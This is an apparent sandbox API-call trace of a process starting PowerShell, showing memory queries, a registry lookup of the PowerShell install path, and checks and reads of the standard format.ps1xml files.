	[0039.642] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.643] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.646] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.659] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.660] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.660] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.660] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.660] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.661] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.661] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.662] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.668] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.674] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.674] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.676] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.676] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.677] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.678] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.679] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.679] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.680] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.680] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.680] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.681] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.681] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.684] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.690] VirtualQuery (in: lpAddress=0x25d3c8, lpBuffer=0x25e3c8, dwLength=0x1c | out: lpBuffer=0x25e3c8*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.691] VirtualQuery (in: lpAddress=0x25d3c8, lpBuffer=0x25e3c8, dwLength=0x1c | out: lpBuffer=0x25e3c8*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.691] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.693] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.753] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.753] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.753] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.769] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0039.769] GetLastError () returned 0xcb
	[0039.772] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.783] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.783] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.784] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.784] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.786] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.786] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.790] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.793] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.800] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e54c | out: phkResult=0x25e54c*=0x330) returned 0x0
	[0039.800] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x25e5b4, lpData=0x0, lpcbData=0x25e5b0*=0x0 | out: lpType=0x25e5b4*=0x1, lpData=0x0, lpcbData=0x25e5b0*=0x74) returned 0x0
	[0039.801] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x25e594, lpData=0x0, lpcbData=0x25e590*=0x0 | out: lpType=0x25e594*=0x1, lpData=0x0, lpcbData=0x25e590*=0x74) returned 0x0
	[0039.801] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x25e594, lpData=0x190b58, lpcbData=0x25e590*=0x74 | out: lpType=0x25e594*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x25e590*=0x74) returned 0x0
	[0039.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x25e114, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0039.801] GetLastError () returned 0xcb
	[0039.801] SetErrorMode (uMode=0x1) returned 0x1
	[0039.801] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x25e594 | out: lpFileInformation=0x25e594*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x919bae56, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x919bae56, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0039.802] GetLastError () returned 0xcb
	[0039.802] SetErrorMode (uMode=0x1) returned 0x1
	[0039.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x25e108, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0039.803] GetLastError () returned 0xcb
	[0039.803] SetErrorMode (uMode=0x1) returned 0x1
	[0039.803] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e588 | out: lpFileInformation=0x25e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0039.803] GetLastError () returned 0xcb
	[0039.803] SetErrorMode (uMode=0x1) returned 0x1
	[0039.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25e108, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0039.803] GetLastError () returned 0xcb
	[0039.804] SetErrorMode (uMode=0x1) returned 0x1
	[0039.804] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e588 | out: lpFileInformation=0x25e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0039.804] GetLastError () returned 0xcb
	[0039.804] SetErrorMode (uMode=0x1) returned 0x1
	[0039.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25e108, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0039.804] GetLastError () returned 0xcb
	[0039.804] SetErrorMode (uMode=0x1) returned 0x1
	[0039.804] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e588 | out: lpFileInformation=0x25e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0039.804] GetLastError () returned 0xcb
	[0039.804] SetErrorMode (uMode=0x1) returned 0x1
	[0039.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25e108, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0039.804] GetLastError () returned 0xcb
	[0039.804] SetErrorMode (uMode=0x1) returned 0x1
	[0039.804] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e588 | out: lpFileInformation=0x25e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0039.805] GetLastError () returned 0xcb
	[0039.805] SetErrorMode (uMode=0x1) returned 0x1
	[0039.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25e108, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0039.805] GetLastError () returned 0xcb
	[0039.805] SetErrorMode (uMode=0x1) returned 0x1
	[0039.805] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e588 | out: lpFileInformation=0x25e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0039.805] GetLastError () returned 0xcb
	[0039.805] SetErrorMode (uMode=0x1) returned 0x1
	[0039.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25e108, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0039.805] GetLastError () returned 0xcb
	[0039.805] SetErrorMode (uMode=0x1) returned 0x1
	[0039.805] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e588 | out: lpFileInformation=0x25e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0039.805] GetLastError () returned 0xcb
	[0039.805] SetErrorMode (uMode=0x1) returned 0x1
	[0039.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25e108, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0039.805] GetLastError () returned 0xcb
	[0039.805] SetErrorMode (uMode=0x1) returned 0x1
	[0039.805] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e588 | out: lpFileInformation=0x25e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0039.806] GetLastError () returned 0xcb
	[0039.806] SetErrorMode (uMode=0x1) returned 0x1
	[0039.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25e108, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0039.806] GetLastError () returned 0xcb
	[0039.806] SetErrorMode (uMode=0x1) returned 0x1
	[0039.806] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e588 | out: lpFileInformation=0x25e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0039.806] GetLastError () returned 0xcb
	[0039.806] SetErrorMode (uMode=0x1) returned 0x1
	[0039.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25e108, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0039.806] GetLastError () returned 0xcb
	[0039.806] SetErrorMode (uMode=0x1) returned 0x1
	[0039.806] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e588 | out: lpFileInformation=0x25e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0039.806] GetLastError () returned 0xcb
	[0039.806] SetErrorMode (uMode=0x1) returned 0x1
	[0039.808] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0039.808] GetLastError () returned 0xcb
	[0039.819] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0039.819] GetLastError () returned 0xcb
	[0039.820] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0039.820] GetLastError () returned 0xcb
	[0039.823] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0039.823] GetLastError () returned 0xcb
	[0039.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0039.824] GetLastError () returned 0xcb
	[0039.824] SetErrorMode (uMode=0x1) returned 0x1
	[0039.824] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0039.824] GetLastError () returned 0x0
	[0039.824] GetFileType (hFile=0x300) returned 0x1
	[0039.825] SetErrorMode (uMode=0x1) returned 0x1
	[0039.825] GetFileType (hFile=0x300) returned 0x1
	[0039.825] ReadFile (in: hFile=0x300, lpBuffer=0x23cde48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x23cde48*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0039.829] GetLastError () returned 0x0
	[0039.829] ReadFile (in: hFile=0x300, lpBuffer=0x23cde48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x23cde48*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0039.829] GetLastError () returned 0x0
